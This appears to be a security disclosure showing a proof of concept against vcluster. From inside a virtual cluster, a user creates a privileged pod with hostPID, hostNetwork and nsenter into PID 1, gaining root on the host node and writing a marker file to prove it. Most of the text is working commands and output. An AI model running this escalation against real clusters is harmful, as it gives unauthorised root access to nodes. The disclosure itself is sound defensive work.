This is pretty straight forward, don't let people you don't trust use vcluster unless you want people to have root access to your cluster nodes.
Below is proof of concept on how to get root access as a user in a vcluster cluster.
I did the kubectl deployment documented here. The other deployments yield the same results.
vcluster-test$ kubectl create ns nesting-cluster
namespace/nesting-cluster created
vcluster-test$ kubectl -n nesting-cluster apply -f deploy_cluster.yaml
serviceaccount/vcluster-1 created
role.rbac.authorization.k8s.io/vcluster-1 created
rolebinding.rbac.authorization.k8s.io/vcluster-1 created
service/vcluster-1 created
service/vcluster-1-headless created
statefulset.apps/vcluster-1 created
vcluster-test$ kubectl -n nesting-cluster get pods
NAME READY STATUS RESTARTS AGE
coredns-66c464876b-rfcmk-x-kube-system-x-vcluster-1 1/1 Running 0 15s
vcluster-1-0 2/2 Running 0 28s
vcluster-test$ kubectl -n nesting-cluster exec -it vcluster-1-0 -- sh
Defaulted container "virtual-cluster" out of: virtual-cluster, syncer
/ # kubectl create ns nesting-cluster
namespace/nesting-cluster created
/ # cat <<EOF | kubectl apply -f -
> apiVersion: v1
> kind: Pod
> metadata:
> name: node-shell
> spec:
> containers:
> - command:
> - nsenter
> - --target
> - "1"
> - --mount
> - --uts
> - --ipc
> - --net
> - --pid
> - --
> - bash
> - -c
> - |
> echo WELL THIS IS INSECURE > /dev/shm/hacked.txt
> image: docker.io/library/alpine
> imagePullPolicy: Always
> name: nsenter
> securityContext:
> privileged: true
> stdin: true
> stdinOnce: true
> tty: true
> dnsPolicy: ClusterFirst
> enableServiceLinks: true
> hostNetwork: true
> hostPID: true
> nodeName: $(kubectl get nodes | grep -v ^NAME | head -n1 | awk '{print $1}')
> preemptionPolicy: PreemptLowerPriority
> priority: 0
> restartPolicy: Never
> EOF
pod/node-shell created
/ # exit
vcluster-test$
vcluster-test$ kubectl node-shell docker-desktop
spawning "nsenter-mkcilr" on "docker-desktop"
If you don't see a command prompt, try pressing enter.
docker-desktop:/# cat /dev/shm/hacked.txt
WELL THIS IS INSECURE